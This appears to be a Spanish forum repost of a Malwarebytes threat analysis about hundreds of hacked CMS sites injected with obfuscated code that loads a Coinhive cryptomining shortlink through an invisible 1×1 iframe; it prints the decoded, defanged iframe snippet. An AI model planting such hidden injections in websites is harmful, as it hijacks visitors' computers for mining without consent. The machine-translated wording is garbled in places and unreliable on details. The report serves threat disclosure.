En las últimas semanas, nuestros rastreadores han catalogado varios cientos de sitios utilizando una variedad de CMS, todos ellos inyectados con el mismo código ofuscado que utiliza el enlace corto de Coinhive para realizar silenciosas unidades de disco duro. Al pivotar sobre este indicador de compromiso, pudimos identificar una infraestructura más grande que recibe tráfico de varios miles de sitios pirateados que actúan como puertas de entrada para redirigir el tráfico a un servidor central involucrado en la distribución de mineros de moneda estándar y web.
Como parte de nuestros rastreos regulares, buscamos redireccionamientos conocidos a sitios de interés y, últimamente, la mayoría se han relacionado con dominios de Coinhive. Detectamos cientos de dominios nuevos, todos los sitios web legítimos a los que se les inyectó una publicidad de código hexadecimal. Una vez decodificado, se muestra como un iframe invisible (1 × 1 píxel) a cnhv [.] Co / 3h2b2. Creemos que es parte de la misma campaña que fue expuesta por la gente de Sucuri a fines de mayo.
Código:
<i frame src="https://cnhv[.]co/3h2b2" width="1" height="1" align="left"></i frame>
Más información: https://blog.malwarebytes.com/threat-analysis/2018/07/obfuscated-coinhive-shortlink-reveals-larger-mining-operation/
Saludos.